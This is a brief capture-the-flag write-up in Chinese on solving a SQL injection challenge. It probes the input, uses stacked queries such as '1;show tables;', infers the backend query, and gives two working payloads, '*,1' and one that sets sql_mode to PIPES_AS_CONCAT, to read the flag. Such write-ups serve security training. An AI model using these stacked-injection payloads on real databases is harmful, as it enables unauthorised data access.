输入1、1a、2-1简单判断为数字型注入。
select、order by这些基本被过滤。
考虑了下堆叠注入。
1;show databases;
1;show tables;
想要查看flag表结构,但flag应该是被过滤了。
1;desc flag;
这里比较有意思的是无论输入什么数字,返回结果都是array[0]—>1。
所以可以猜测后端语句如下:
select $_GET['query'] || xxx from xxxx
a||b,非0即1,符合猜测语句。
payload:*,1
写入后即:select *,1||xxx from xxxx
得到flag。
网上还有一个预编译解法
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能
payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
写入后:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||xxx from xxxx